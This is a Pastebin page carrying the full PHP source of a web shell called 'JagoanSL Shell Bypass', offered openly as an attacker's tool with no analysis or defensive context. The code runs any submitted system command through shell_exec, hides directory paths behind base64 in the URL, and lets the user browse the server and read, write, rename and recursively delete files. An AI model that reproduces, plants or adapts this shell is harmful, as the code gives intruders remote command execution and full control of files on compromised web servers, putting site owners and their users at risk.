API tools faq
paste
willysec_id

JagoanSL Shell Bypass

willysec_id
Jun 23rd, 2024 (edited)
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.55 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>.:: Jagoan SL ::.</title>
  5.     <link href="https://fonts.googleapis.com/css?family=Protest Revolution" rel="stylesheet">
  6.     <style>
  7.       body {
  8.     font-family: 'Protest Revolution';
  9.     background-color: #f9f9f9;
  10.     color: red;
  11.     margin: 0;
  12.     padding: 0;
  13.     text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.5);
  14. }
  15.         .container {
  16.             max-width: 800px;
  17.             margin: 20px auto;
  18.             padding: 20px;
  19.             background-color: #fff;
  20.             border-radius: 5px;
  21.             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  22.         }
  23.         .result-box {
  24.             width: 97.5%;
  25.             height: 200px;
  26.             resize: none;
  27.             overflow: auto;
  28.             font-family: 'Protest Revolution';
  29.             background-color: #f4f4f4;
  30.             padding: 10px;
  31.             border: 1px solid #ddd;
  32.             margin-bottom: 10px;
  33.         }
  34.         hr {
  35.             border: 0;
  36.             border-top: 1px solid #ddd;
  37.             margin: 20px 0;
  38.         }
  39.         table {
  40.             width: 100%;
  41.             border-collapse: collapse;
  42.             margin-top: 20px;
  43.         }
  44.         th, td {
  45.             padding: 8px;
  46.             text-align: left;
  47.         }
  48.         th {
  49.             background-color: #f2f2f2;
  50.         }
  51.         tr:nth-child(even) {
  52.             background-color: #f9f9f9;
  53.         }
  54.         tr:hover {
  55.             background-color: #f2f2f2;
  56.         }
  57.         input[type="text"], input[type="submit"], textarea[name="file_content"] {
  58.             width: calc(100% - 10px);
  59.             margin-bottom: 10px;
  60.             padding: 8px;
  61.             max-height: 200px;
  62.             resize: vertical;
  63.             border: 1px solid #ddd;
  64.             border-radius: 3px;
  65.             font-family: 'Protest Revolution';
  66.         }
  67.         input[type="submit"] {
  68.             background-color: #4CAF50;
  69.             color: white;
  70.             font-family: 'Protest Revolution';
  71.             border: none;
  72.             cursor: pointer;
  73.         }
  74.         input[type="submit"]:hover {
  75.             background-color: #45a049;
  76.         }
  77.         .item-name {
  78.             max-width: 200px;
  79.             overflow: hidden;
  80.             text-overflow: ellipsis;
  81.             white-space: nowrap;
  82.         }
  83.     </style>
  84. </head>
  85. <body>
  86. <div class="container">
  87. <?php
  88. $rootDirectory = realpath($_SERVER['DOCUMENT_ROOT']);
  89.  
  90. function x($b)
  91. {
  92.     return base64_encode($b);
  93. }
  94.  
  95. function y($b)
  96. {
  97.     return base64_decode($b);
  98. }
  99.  
  100. foreach ($_GET as $c => $d) $_GET[$c] = y($d);
  101.  
  102. $currentDirectory = realpath(isset($_GET['d']) ? $_GET['d'] : $rootDirectory);
  103. chdir($currentDirectory);
  104.  
  105. $viewCommandResult = '';
  106.  
  107. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  108.     if (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) {
  109.         $newFolder = $currentDirectory . '/' . $_POST['folder_name'];
  110.         if (!file_exists($newFolder)) {
  111.             mkdir($newFolder);
  112.             echo '<hr>Folder created successfully!';
  113.         } else {
  114.             echo '<hr>Error: Folder already exists!';
  115.         }
  116.     } elseif (isset($_POST['file_name']) && !empty($_POST['file_name'])) {
  117.         $newFile = $currentDirectory . '/' . $_POST['file_name'];
  118.         if (!file_exists($newFile)) {
  119.             if (file_put_contents($newFile, '') !== false) {
  120.                 echo '<hr>File created successfully!';
  121.             } else {
  122.                 echo '<hr>Error: Failed to create file!';
  123.             }
  124.         } else {
  125.             echo '<hr>Error: File already exists!';
  126.         }
  127.     } elseif (isset($_POST['edit_file'], $_POST['file_content'])) {
  128.         $fileToEdit = $currentDirectory . '/' . $_POST['edit_file'];
  129.         if (file_exists($fileToEdit)) {
  130.             if (!empty($_POST['file_content'])) {
  131.                 if (file_put_contents($fileToEdit, $_POST['file_content']) !== false) {
  132.                     echo '<hr>File edited successfully!';
  133.                 } else {
  134.                     echo '<hr>Error: Failed to edit file!';
  135.                 }
  136.             } else {
  137.                 echo '<hr>Error: File content cannot be blank!';
  138.             }
  139.         } else {
  140.             echo '<hr>Error: File not found!';
  141.         }
  142.     } elseif (isset($_POST['delete_file'])) {
  143.         $fileToDelete = $currentDirectory . '/' . $_POST['delete_file'];
  144.         if (file_exists($fileToDelete)) {
  145.             if (unlink($fileToDelete)) {
  146.                 echo '<hr>File deleted successfully!';
  147.             } else {
  148.                 echo '<hr>Error: Failed to delete file!';
  149.             }
  150.         } elseif (is_dir($fileToDelete)) {
  151.             if (deleteDirectory($fileToDelete)) {
  152.                 echo '<hr>Folder deleted successfully!';
  153.             } else {
  154.                 echo '<hr>Error: Failed to delete folder!';
  155.             }
  156.         } else {
  157.             echo '<hr>Error: File or directory not found!';
  158.         }
  159.     } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) {
  160.         $oldName = $currentDirectory . '/' . $_POST['old_name'];
  161.         $newName = $currentDirectory . '/' . $_POST['new_name'];
  162.         if (file_exists($oldName)) {
  163.             if (rename($oldName, $newName)) {
  164.                 echo '<hr>Item renamed successfully!';
  165.             } else {
  166.                 echo '<hr>Error: Failed to rename item!';
  167.             }
  168.         } else {
  169.             echo '<hr>Error: Item not found!';
  170.         }
  171.     } elseif (isset($_POST['cmd_input'])) {
  172.         $command = $_POST['cmd_input'];
  173.         $output = shell_exec($command);
  174.         $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($output) . '</textarea>';
  175.     } elseif (isset($_POST['view_file'])) {
  176.         $fileToView = $currentDirectory . '/' . $_POST['view_file'];
  177.         if (file_exists($fileToView)) {
  178.             $fileContent = file_get_contents($fileToView);
  179.             $viewCommandResult = '<hr><p>Result: ' . $_POST['view_file'] . '</p><textarea class="result-box">' . htmlspecialchars($fileContent) . '</textarea>';
  180.         } else {
  181.             $viewCommandResult = '<hr><p>Error: File not found!</p>';
  182.         }
  183.     }
  184. }
  185. echo '<center>
  186. <div class="fig-ansi">
  187. <pre id="taag_font_ANSIShadow" class="fig-ansi"><span style="color: #ff0000;">   <strong> __    Bye Bye Litespeed   _____ __    
  188. __|  |___ ___ ___ ___ ___   |   __|  |  
  189. |  |  | .\'| . | . | .\'|   |  |__   |  |__
  190. |_____|__,|_  |___|__,|_|_|  |_____|_____|
  191.          |___| ./Heartzz                        </strong> </span></pre>
  192. </div>
  193. </center>';
  194. echo '<hr>curdir: ';
  195. $directories = explode(DIRECTORY_SEPARATOR, $currentDirectory);
  196. $currentPath = '';
  197. foreach ($directories as $index => $dir) {
  198.     if ($index == 0) {
  199.         echo '<a href="?d=' . x($dir) . '">' . $dir . '</a>';
  200.     } else {
  201.         $currentPath .= DIRECTORY_SEPARATOR . $dir;
  202.         echo ' / <a href="?d=' . x($currentPath) . '">' . $dir . '</a>';
  203.     }
  204. }
  205. echo '<br>';
  206.  
  207. echo '<hr><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="folder_name" placeholder="New Folder Name"><input type="submit" value="Create Folder"></form>';
  208. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="file_name" placeholder="Create New File"><input type="submit" value="Create File"></form>';
  209. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="edit_file" placeholder="Edit Existing File"><textarea name="file_content" placeholder="File Content"></textarea><input type="submit" value="Edit File"></form>';
  210. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="cmd_input" placeholder="Enter command"><input type="submit" value="Run Command"></form>';
  211. echo $viewCommandResult;
  212. echo '<div>';
  213. echo '</div>';
  214. echo '<table border=1>';
  215. echo '<br><tr><th>Item Name</th><th>Size</th><th>View</th><th>Delete</th><th>Rename</th></tr>';
  216. foreach (scandir($currentDirectory) as $v) {
  217.     $u = realpath($v);
  218.     $s = stat($u);
  219.     $itemLink = is_dir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v));
  220.     echo '<tr><td class="item-name"><a href="'.$itemLink.'">'.$v.'</a></td><td>'.$s['size'].'</td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="view_file" value="'.htmlspecialchars($v).'"><input type="submit" value="View"></form></td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="delete_file" value="'.htmlspecialchars($v).'"><input type="submit" value="Delete"></form></td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="old_name" value="'.htmlspecialchars($v).'"><input type="text" name="new_name" placeholder="New Name"><input type="submit" name="rename_item" value="Rename"></form></td></tr>';
  221. }
  222. echo '</table>';
  223. function deleteDirectory($dir) {
  224.     if (!file_exists($dir)) {
  225.         return true;
  226.     }
  227.     if (!is_dir($dir)) {
  228.         return unlink($dir);
  229.     }
  230.     foreach (scandir($dir) as $item) {
  231.         if ($item == '.' || $item == '..') {
  232.             continue;
  233.         }
  234.         if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
  235.             return false;
  236.         }
  237.     }
  238.     return rmdir($dir);
  239. }
  240. ?>
  241.  
  242. </div>
  243. </body>
  244. </html>
  245.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!